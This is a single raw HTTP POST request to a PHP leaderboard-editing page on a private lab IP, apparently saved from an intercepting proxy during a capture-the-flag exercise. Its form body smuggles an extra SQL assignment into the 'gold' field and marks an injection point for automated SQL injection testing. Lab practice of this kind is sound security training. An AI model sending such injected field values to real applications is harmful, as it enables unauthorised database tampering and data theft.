POST /edit_leaderboard.php HTTP/1.1
Host: 10.10.166.179
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:134.0) Gecko/20100101 Firefox/134.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: vi-VN,vi;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 65
Origin: http://10.10.166.179
Connection: keep-alive
Referer: http://10.10.166.179/edit_leaderboard.php?rank=1&country=USA
Cookie: PHPSESSID=eahbt9v41fv9ad55eipv4co1d6
Upgrade-Insecure-Requests: 1
Priority: u=0, i

rank=2&country="abc"&gold=222,country=1123*&silver=21&bronze=12345
